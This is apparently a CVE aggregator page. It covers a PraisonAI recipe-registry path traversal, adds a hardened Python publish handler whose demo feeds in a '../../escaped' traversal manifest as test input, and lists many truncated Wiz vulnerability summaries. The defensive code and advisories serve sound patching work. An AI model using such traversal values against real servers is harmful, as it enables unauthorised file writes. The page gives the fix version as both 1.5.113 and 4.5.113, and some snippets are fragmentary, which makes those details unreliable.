CVE-2026-39308
Published: 2026-04-07
Priority: P346 · high · CVSS 3.1 base score 7.1
CVSS 3.1 vector: AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L
EPSS: 0.33% (25.2nd percentile)
PraisonAI is a multi-agent teams system. Prior to 1.5.113, PraisonAI's recipe registry publish endpoint writes uploaded recipe bundles to a filesystem path derived from the bundle's internal manifest.json before it verifies that the manifest name and version match the HTTP route. A malicious publisher can place ../ traversal sequences in the bundle manifest and cause the registry server to create files outside the configured registry root even though the request is ultimately rejected with HTTP 400. This is an arbitrary file write / path traversal issue on the registry host. It affects deployments that expose the recipe registry publish flow. If the registry is intentionally run without a token, any network client that can reach the service can trigger it. If a token is configured, any user with publish access can still exploit it. This vulnerability is fixed in 1.5.113.
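The fix class the advisory describes is an ordering problem: the route check and the path containment check must both run before the first write. The following is an added example of a hardened publish flow, not PraisonAI's code; it assumes (not stated by the advisory) that a bundle is a zip containing `manifest.json` with `name` and `version` keys and that the registry stores bundles at `<root>/<name>/<version>/bundle.zip`.

```python
"""Hardened recipe-registry publish flow (added example, not PraisonAI's code).

Assumptions not taken from the advisory: the bundle is a zip containing
manifest.json with "name" and "version" keys, and the registry stores each
bundle at <root>/<name>/<version>/bundle.zip. The point is the ordering:
validate route vs. manifest and confine the destination under the registry
root BEFORE anything touches disk, so a rejected request leaves no file behind.
"""
import io
import json
import re
import tempfile
import zipfile
from pathlib import Path

# Allow-list for a single path component: no separators, no leading dot,
# so "../x", "a/b" and ".hidden" can never be a valid name or version.
_SAFE_COMPONENT = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


class PublishRejected(ValueError):
    """Raised before any filesystem write when a bundle fails validation."""


def read_manifest(bundle: bytes) -> dict:
    """Parse manifest.json out of the uploaded bundle without extracting it."""
    try:
        with zipfile.ZipFile(io.BytesIO(bundle)) as zf:
            raw = zf.read("manifest.json")
        manifest = json.loads(raw)
    except (zipfile.BadZipFile, KeyError, ValueError) as exc:
        raise PublishRejected(f"bundle has no readable manifest.json: {exc}") from exc
    if not isinstance(manifest, dict):
        raise PublishRejected("manifest.json must be a JSON object")
    return manifest


def safe_destination(root: Path, name: str, version: str) -> Path:
    """Return <root>/<name>/<version>/bundle.zip, or reject it.

    Two independent checks: the components must match the allow-list, and the
    resolved path must still lie inside the resolved registry root. The second
    check catches anything the first one misses (symlinks, odd normalisation).
    """
    for label, value in (("name", name), ("version", version)):
        if not isinstance(value, str) or not _SAFE_COMPONENT.match(value):
            raise PublishRejected(f"manifest {label} {value!r} is not a safe path component")
    root_resolved = root.resolve()
    dest = (root_resolved / name / version / "bundle.zip").resolve()
    if not dest.is_relative_to(root_resolved):  # Python 3.9+
        raise PublishRejected(f"destination {dest} escapes registry root {root_resolved}")
    return dest


def publish(root: Path, route_name: str, route_version: str, bundle: bytes) -> Path:
    """Publish handler: all validation happens before the single write at the end."""
    manifest = read_manifest(bundle)
    # 1. The HTTP route is the authority; the manifest must agree with it.
    if manifest.get("name") != route_name or manifest.get("version") != route_version:
        raise PublishRejected("manifest name/version do not match the publish route")
    # 2. Derive the destination from the validated route values and confine it.
    dest = safe_destination(root, route_name, route_version)
    # 3. Only now touch the filesystem.
    dest.parent.mkdir(parents=True, exist_ok=True)
    dest.write_bytes(bundle)
    return dest


def make_bundle(name: str, version: str) -> bytes:
    """Construct a minimal in-memory bundle (constructed fixture, not a real recipe)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("manifest.json", json.dumps({"name": name, "version": version}))
        zf.writestr("recipe.yaml", "steps: []\n")
    return buf.getvalue()


def is_rejected(name: str, version: str) -> bool:
    """True if safe_destination refuses the pair (uses a throwaway root)."""
    with tempfile.TemporaryDirectory() as tmp:
        try:
            safe_destination(Path(tmp), name, version)
            return False
        except PublishRejected:
            return True


def demo() -> dict:
    """Run a good publish and a traversal manifest in a temp dir; report the outcome."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "registry"
        root.mkdir()
        good = publish(root, "weather", "1.0.0", make_bundle("weather", "1.0.0"))
        results["good_written"] = good.is_file()
        # Manifest name carries "../" and disagrees with the route: rejected at step 1.
        try:
            publish(root, "weather", "1.0.0", make_bundle("../../escaped", "1.0.0"))
            results["traversal_rejected"] = False
        except PublishRejected:
            results["traversal_rejected"] = True
        # A rejected request must leave nothing beside the registry directory.
        results["only_registry_in_tmp"] = sorted(p.name for p in Path(tmp).iterdir()) == ["registry"]
    return results
```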
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mervinpraison | praisonai | < 4.5.113 | 4.5.113 |
| mervinpraison | praisonai | >= 0 < 4.5.113 | 4.5.113 |
| praison | praisonai | <= 4.5.112 | — |
OSV: PraisonAI recipe registry publish path traversal allows out-of-root file write (osv, 2026-04-06)
GHSA: CVE-2026-39308 [HIGH] CWE-22 PraisonAI recipe registry publish path traversal allows out-of-root file write (ghsa, 2026-04-06)
No detection rules found.
No public exploits indexed.
Wiz
CVE-2026-27448 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 1.7
CVE-2026-27448 [LOW] CVE-2026-27448 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27448 :
Python vulnerability analysis and mitigation
set_tlsext_servername_callback
Source : NVD
## 1.7
Score
Published March 18, 2026
Severity LOW
CNA Score 1.7
Affected Technologies
Python
CBL Mariner
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
gitlab-cng-18.9
gitlab-cng-fips-18.8
Sources
NVD
CBL-Mariner 3.0 Severity LOW Has Fix Added at: Mar 29, 2026
Chainguard Has Fix Added at: Mar 18, 2026
Container-Optimized OS Severity MEDIUM Has Fix Added at: Apr 05, 2026
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Mar 19, 2026
Debian 14 Severity MEDIUM Has Fix Added at: Mar 19, 2026
Ech
Wiz
CVE-2026-22690 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.7
CVE-2026-22690 [LOW] CVE-2026-22690 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22690 :
Python vulnerability analysis and mitigation
pypdf is a free and open-source pure-python PDF library. Prior to version 6.6.0, pypdf has possible long runtimes for missing /Root object with large /Size values. An attacker who uses this vulnerability can craft a PDF which leads to possibly long runtimes for actually invalid files. This can be achieved by omitting the /Root entry in the trailer, while using a rather large /Size value. Only the non-strict reading mode is affected. This issue has been patched in version 6.6.0.
Source : NVD
## 2.7
Score
Published January 10, 2026
Severity LOW
CNA Score 2.7
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability
Wiz
CVE-2026-32727 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-32727 [HIGH] CVE-2026-32727 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32727 :
Python vulnerability analysis and mitigation
SciTokens is a reference library for generating and using SciTokens. Prior to version 1.9.7, the Enforcer is vulnerable to a path traversal attack where an attacker can use dot-dot (..) in the scope claim of a token to escape the intended directory restriction. This occurs because the library normalizes both the authorized path (from the token) and the requested path (from the application) before comparing them using startswith. This issue has been patched in version 1.9.7.
Source : NVD
## 6.5
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 8.1
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentil
Wiz
CVE-2026-25048 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-25048 [HIGH] CVE-2026-25048 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25048 :
Python vulnerability analysis and mitigation
xgrammar is an open-source library for efficient, flexible, and portable structured generation. Prior to version 0.1.32, the multi-level nested syntax caused a segmentation fault (core dumped). This issue has been patched in version 0.1.32.
Source : NVD
## 8.7
Score
Published March 5, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Python
Chainguard
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.8
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
py3-vllm-cuda-12.4
xgrammar
Sources
NVD
Chainguard Has Fix Added at: Mar 17, 2026
pip Severity HIGH Has Fix Added at: Mar 08, 2026
## Get
Wiz
CVE-2026-5463 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
CVE-2026-5463 [CRITICAL] CVE-2026-5463 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-5463 :
Python vulnerability analysis and mitigation
Command injection vulnerability in console.run_module_with_output() in pymetasploit3 through version 1.0.6 allows attackers to inject newline characters into module options such as RHOSTS. This breaks the intended command structure and causes the Metasploit console to execute additional unintended commands, potentially leading to arbitrary command execution and manipulation of Metasploit sessions.
Source : NVD
## 9.3
Score
Published April 3, 2026
Severity CRITICAL
CNA Score 9.3
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 77.7
Exploitation Probability (EPSS) 1.1
Affected packages and libra
Wiz
CVE-2026-24490 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-24490 [HIGH] CVE-2026-24490 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24490 :
Python vulnerability analysis and mitigation
android:host
Source : NVD
## 4.8
Score
Published January 27, 2026
Severity MEDIUM
CNA Score 8.1
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mobsf
Sources
NVD
pip Severity HIGH Has Fix Added at: Jan 27, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CVE-2026-35615
CRITICAL
9.2
Wiz
CVE-2026-23892 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.0
CVE-2026-23892 [MEDIUM] CVE-2026-23892 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23892 :
Python vulnerability analysis and mitigation
OctoPrint provides a web interface for controlling consumer 3D printers. OctoPrint versions up to and including 1.11.5 are affected by a (theoretical) timing attack vulnerability that allows API key extraction over the network. Due to using character based comparison that short-circuits on the first mismatched character during API key validation, rather than a cryptographical method with static runtime regardless of the point of mismatch, an attacker with network based access to an affected OctoPrint could extract API keys valid on the instance by measuring the response times of the denied access responses and guess an API key character by character. The vulnerability is patched in version 1.11.6. The likelihood of this att
Wiz
GHSA-f2mf-q878-gh58 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-f2mf-q878-gh58 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-f2mf-q878-gh58 :
Python vulnerability analysis and mitigation
Affected Product: Parsl (Python Parallel Scripting Library) Component: parsl.monitoring.visualization Vulnerability Type: SQL Injection (CWE-89) Severity: High (CVSS Rating Recommended: 7.5 - 8.6) URL: https://github.com/Parsl/parsl/blob/master/parsl/monitoring/visualization/views.py Summary A SQL Injection vulnerability exists in the parsl-visualize component of the Parsl library. The application constructs SQL queries using unsafe string formatting (Python % operator) with user-supplied input (workflow_id) directly from URL routes. This allows an unauthenticated attacker with access to the visualization dashboard to inject arbitrary SQL commands, potentially leading to data exfiltration or denial of service against t
Wiz
CVE-2026-34591 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-34591 [HIGH] CVE-2026-34591 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34591 :
Python vulnerability analysis and mitigation
Poetry is a dependency manager for Python. From version 1.4.0 to before version 2.3.3, a crafted wheel can contain ../ paths that Poetry writes to disk without containment checks, allowing arbitrary file write with the privileges of the Poetry process. It is reachable from untrusted package artifacts during normal install flows. (Normally, installing a malicious wheel is not sufficient for execution of malicious code. Malicious code will only be executed after installation if the malicious package is imported or invoked by the user.). This issue has been patched in version 2.3.3.
Source : NVD
## 7.1
Score
Published April 2, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Python
MinimOS
Has Public Exploit
Wiz
CVE-2025-70560 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.4
CVE-2025-70560 [HIGH] CVE-2025-70560 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-70560 :
Python vulnerability analysis and mitigation
Boltz 2.0.0 contains an insecure deserialization vulnerability in its molecule loading functionality. The application uses Python pickle to deserialize molecule data files without validation. An attacker with the ability to place a malicious pickle file in a directory processed by boltz can achieve arbitrary code execution when the file is loaded.
Source : NVD
## 8.4
Score
Published February 3, 2026
Severity HIGH
CNA Score 8.4
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 20.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
boltz
Sources
NVD
pip Severity HIGH No Fix
Wiz
CVE-2026-25733 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.3
CVE-2026-25733 [HIGH] CVE-2026-25733 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25733 :
Python vulnerability analysis and mitigation
Rucio is a software framework that provides functionality to organize, manage, and access large volumes of scientific data using customizable policies. Versions prior to 35.8.3, 38.5.4, and 39.3.1 have a stored Cross-Site Scripting (XSS) vulnerability in the Custom Rules function of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions. Versions 35.8.3, 38.5.4, and 39.3.1 fix the issue.
Source : NVD
## 5.4
Score
Published February 25, 2026
Severity MEDIUM
CNA Score 7.3
Wiz
CVE-2025-67485 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-67485 [MEDIUM] CVE-2025-67485 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67485 :
Python vulnerability analysis and mitigation
mad-proxy is a Python-based HTTP/HTTPS proxy server for detection and blocking of malicious web activity using custom security policies. Versions 0.3 and below allow attackers to bypass HTTP/HTTPS traffic interception rules, potentially exposing sensitive traffic. This issue does not have a fix at the time of publication.
Source : NVD
## 5.3
Score
Published December 10, 2025
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22.8
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
mad-proxy
Sources
NVD
pip Severity MEDIUM No Fix Added at: Dec 09
Wiz
CVE-2026-26209 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-26209 [HIGH] CVE-2026-26209 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26209 :
Python vulnerability analysis and mitigation
_cbor2
Py_EnterRecursiveCall
RecursionError
0x81
cbor2.loads()
RecursionError
RecursionError
Source : NVD
## 7.5
Score
Published March 23, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Chainguard
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
vllm-openai-cuda-12.9
cbor2
Sources
NVD
Chainguard Has Fix Added at: Mar 29, 2026
Debian 11, 12, 13 Severity HIGH No Fix Added at: Mar 29, 2026
Debian 14 Severity HIGH Has Fix Added at: Mar 29, 2026
Echo Severity HIGH No Fix Added at: Mar 29, 2026
pip Severity HIGH Has Fix Add
Wiz
CVE-2025-14009 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 10.0
CVE-2025-14009 [CRITICAL] CVE-2025-14009 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14009 :
Python vulnerability analysis and mitigation
A critical vulnerability exists in the NLTK downloader component of nltk/nltk, affecting all versions. The _unzip_iter function in nltk/downloader.py uses zipfile.extractall() without performing path validation or security checks. This allows attackers to craft malicious zip packages that, when downloaded and extracted by NLTK, can execute arbitrary code. The vulnerability arises because NLTK assumes all downloaded packages are trusted and extracts them without validation. If a malicious package contains Python files, such as init .py, these files are executed automatically upon import, leading to remote code execution. This issue can result in full system compromise, including file system access, network access, and potent
Wiz
CVE-2026-1260 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.5
CVE-2026-1260 [HIGH] CVE-2026-1260 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1260 :
Python vulnerability analysis and mitigation
Invalid memory access in Sentencepiece versions less than 0.2.1 when using a vulnerable model file, which is not created in the normal training procedure.
Source : NVD
## 8.5
Score
Published January 22, 2026
Severity HIGH
CNA Score 8.5
Affected Technologies
Python
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
sentencepiece
text-generation-inference
Sources
NVD
Chainguard Has Fix Added at: Feb 18, 2026
pip Severity HIGH Has Fix Added at: Jan 23, 2026
Homebrew Severity HIGH Has Fix Added at: Feb 02, 2026
Nix Severity HIGH Has Fix Added
Wiz
CVE-2026-27962 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-27962 [CRITICAL] CVE-2026-27962 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27962 :
Python vulnerability analysis and mitigation
Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a JWK Header Injection vulnerability in authlib's JWS implementation allows an unauthenticated attacker to forge arbitrary JWT tokens that pass signature verification. When key=None is passed to any JWS deserialization function, the library extracts and uses the cryptographic key embedded in the attacker-controlled JWT jwk header field. An attacker can sign a token with their own private key, embed the matching public key in the header, and have the server accept the forged token as cryptographically valid — bypassing authentication and authorization entirely. This issue has been patched in version 1.6.9.
Source : NVD
## 9.
Wiz
CVE-2026-27602 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2026-27602 [HIGH] CVE-2026-27602 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27602 :
Python vulnerability analysis and mitigation
exec_cmd()
modoboa/lib/sysutils.py
shell=True
Source : NVD
## 7.2
Score
Published March 25, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 20.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
modoboa
Sources
NVD
pip Severity HIGH Has Fix Added at: Mar 26, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published dat
Wiz
CVE-2026-23946 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-23946 [CRITICAL] CVE-2026-23946 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23946 :
Python vulnerability analysis and mitigation
Tendenci is an open source content management system built for non-profits, associations and cause-based sites. Versions 15.3.11 and below include a critical deserialization vulnerability in the Helpdesk module (which is not enabled by default). This vulnerability allows Remote Code Execution (RCE) by an authenticated user with staff security level due to using Python's pickle module in helpdesk /reports/. The original CVE-2020-14942 was incompletely patched. While ticket_list() was fixed to use safe JSON deserialization, the run_report() function still uses unsafe pickle.loads(). The impact is limited to the permissions of the user running the application, typically www-data, which generally lacks write (except for upload
Wiz
CVE-2025-34469 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2025-34469 [MEDIUM] CVE-2025-34469 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-34469 :
Python vulnerability analysis and mitigation
Cowrie versions prior to 2.9.0 contain a server-side request forgery (SSRF) vulnerability in the emulated shell implementation of wget and curl. In the default emulated shell configuration, these command emulations perform real outbound HTTP requests to attacker-supplied destinations. Because no outbound request rate limiting was enforced, unauthenticated remote attackers could repeatedly invoke these commands to generate unbounded HTTP traffic toward arbitrary third-party targets, allowing the Cowrie honeypot to be abused as a denial-of-service amplification node and masking the attacker’s true source address behind the honeypot’s IP.
Source : NVD
## 6.9
Score
Published December 31, 2025
Severity MEDIUM
CNA Score 6
Wiz
CVE-2026-32634 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-32634 [HIGH] CVE-2026-32634 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32634 :
Python vulnerability analysis and mitigation
[passwords] default
Source : NVD
## 8.1
Score
Published March 18, 2026
Severity HIGH
CNA Score 8.1
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
glances
Sources
NVD
Debian 12, 13 Severity MEDIUM No Fix Added at: Mar 19, 2026
Debian 14 Severity HIGH Has Fix Added at: Mar 19, 2026
Echo Severity HIGH No Fix Added at: Mar 19, 2026
pip Severity HIGH Has Fix Added at: Mar 17, 2026
Homebrew Severity HIGH Has Fix Added at: Mar 20, 2026
Nix Severity HIGH Has Fix Added at: Mar 20, 2026
## Get a CVE risk assess
Wiz
CVE-2026-28518 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.4
CVE-2026-28518 [HIGH] CVE-2026-28518 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28518 :
Python vulnerability analysis and mitigation
OpenViking versions 0.2.1 and prior, fixed in commit 46b3e76, contain a path traversal vulnerability in the .ovpack import handling that allows attackers to write files outside the intended import directory. Attackers can craft malicious ZIP archives with traversal sequences, absolute paths, or drive prefixes in member names to overwrite or create arbitrary files with the importing process privileges.
Source : NVD
## 8.4
Score
Published March 3, 2026
Severity HIGH
CNA Score 8.4
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.4
Exploitation Probability (EPSS) N/A
Affected packages and libra
Wiz
CVE-2026-25211 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.2
CVE-2026-25211 [LOW] CVE-2026-25211 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25211 :
Python vulnerability analysis and mitigation
Llama Stack (aka llama-stack) before 0.4.0rc3 does not censor the pgvector password in the initialization log.
Source : NVD
## 3.2
Score
Published January 30, 2026
Severity LOW
CNA Score 3.2
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
llama-stack
Sources
NVD
pip Severity LOW Has Fix Added at: Jan 31, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Tech
Wiz
GHSA-h3m5-p59h-x88p Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-h3m5-p59h-x88p Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-h3m5-p59h-x88p :
Python vulnerability analysis and mitigation
## Summary
--password
-p
openssl_encrypt/modules/crypt_cli_subparser.py
ps aux
/proc/[pid]/cmdline
## Affected Code
subparser.add_argument(
"--password", "-p",
help="Password (will prompt if not provided, or use CRYPT_PASSWORD environment variable)",
)
--keystore-password
## Impact
CRYPT_PASSWORD
/proc/[pid]/environ
## Recommended Fix
Document the security implications prominently
Recommend interactive prompting (already supported) as the secure default
--password-fd
Consider marking the argument as deprecated in favor of interactive prompting
## Fix
e78a366
releases/1.4.x
Source : NVD
## 6.6
Score
Published March 31, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Python
Wiz
CVE-2026-22871 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-22871 [HIGH] CVE-2026-22871 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22871 :
Python vulnerability analysis and mitigation
GuardDog is a CLI tool to identify malicious PyPI packages. Prior to 2.7.1, there is a path traversal vulnerability exists in GuardDog's safe_extract() function that allows malicious PyPI packages to write arbitrary files outside the intended extraction directory, leading to Arbitrary File Overwrite and Remote Code Execution on systems running GuardDog. This vulnerability is fixed in 2.7.1.
Source : NVD
## 8.7
Score
Published January 13, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 71
Exploitation Probability (EPSS) 0.7
Affected packages and libraries
gua
Wiz
CVE-2026-28500 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-28500 [HIGH] CVE-2026-28500 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28500 :
Python vulnerability analysis and mitigation
Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. In versions up to and including 1.20.1, a security control bypass exists in onnx.hub.load() due to improper logic in the repository trust verification mechanism. While the function is designed to warn users when loading models from non-official sources, the use of the silent=True parameter completely suppresses all security warnings and confirmation prompts. This vulnerability transforms a standard model-loading function into a vector for Zero-Interaction Supply-Chain Attacks. When chained with file-system vulnerabilities, an attacker can silently exfiltrate sensitive files (SSH keys, cloud credentials) from the victim's machine t
Wiz
GHSA-gpx9-96j6-pp87 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-gpx9-96j6-pp87 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-gpx9-96j6-pp87 :
Python vulnerability analysis and mitigation
## Summary
This vulnerability allows a user to escape the container network isolation and access the host’s local services (127.0.0.1 bound on the host).
The vulnerability is applicable only on the MacOS and Windows environments while using Docker Desktop, Containerd on Lima VM, or Podman.
## Details
TaskWeaver is a code-first agent framework for seamlessly planning and executing data analytics tasks. This innovative framework interprets user requests through code snippets and efficiently coordinates a variety of plugins in the form of functions to execute data analytics tasks in a stateful manner.
TaskWeaver agents execute code as part of their tasks in a secure manner inside the code interpreter that implements
Wiz
CVE-2026-32111 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-32111 [MEDIUM] CVE-2026-32111 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32111 :
Python vulnerability analysis and mitigation
ha-mcp is a Home Assistant MCP Server. Prior to 7.0.0, the ha-mcp OAuth consent form (beta feature) accepts a user-supplied ha_url and makes a server-side HTTP request to {ha_url}/api/config with no URL validation. An unauthenticated attacker can submit arbitrary URLs to perform internal network reconnaissance via an error oracle. Two additional code paths in OAuth tool calls (REST and WebSocket) are affected by the same primitive. The primary deployment method (private URL with pre-configured HOMEASSISTANT_TOKEN) is not affected. This vulnerability is fixed in 7.0.0.
Source : NVD
## 5.3
Score
Published March 11, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV E
Wiz
CVE-2026-33752 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-33752 [HIGH] CVE-2026-33752 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33752 :
Python vulnerability analysis and mitigation
curl_cffi is the a Python binding for curl. Prior to 0.15.0, curl_cffi does not restrict requests to internal IP ranges, and follows redirects automatically via the underlying libcurl. Because of this, an attacker-controlled URL can redirect requests to internal services such as cloud metadata endpoints. In addition, curl_cffi’s TLS impersonation feature can make these requests appear as legitimate browser traffic, which may bypass certain network controls. This vulnerability is fixed in 0.15.0.
Source : NVD
## 8.6
Score
Published April 6, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Pro
Wiz
CVE-2026-28786 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-28786 [MEDIUM] CVE-2026-28786 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28786 :
Python vulnerability analysis and mitigation
FileNotFoundError
DATA_DIR
Source : NVD
## 4.3
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
Python
Open WebUI
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpe:2.3:a:openwebui:open_webui
open-webui
Sources
pip Severity MEDIUM Has Fix Added at: Mar 29, 2026
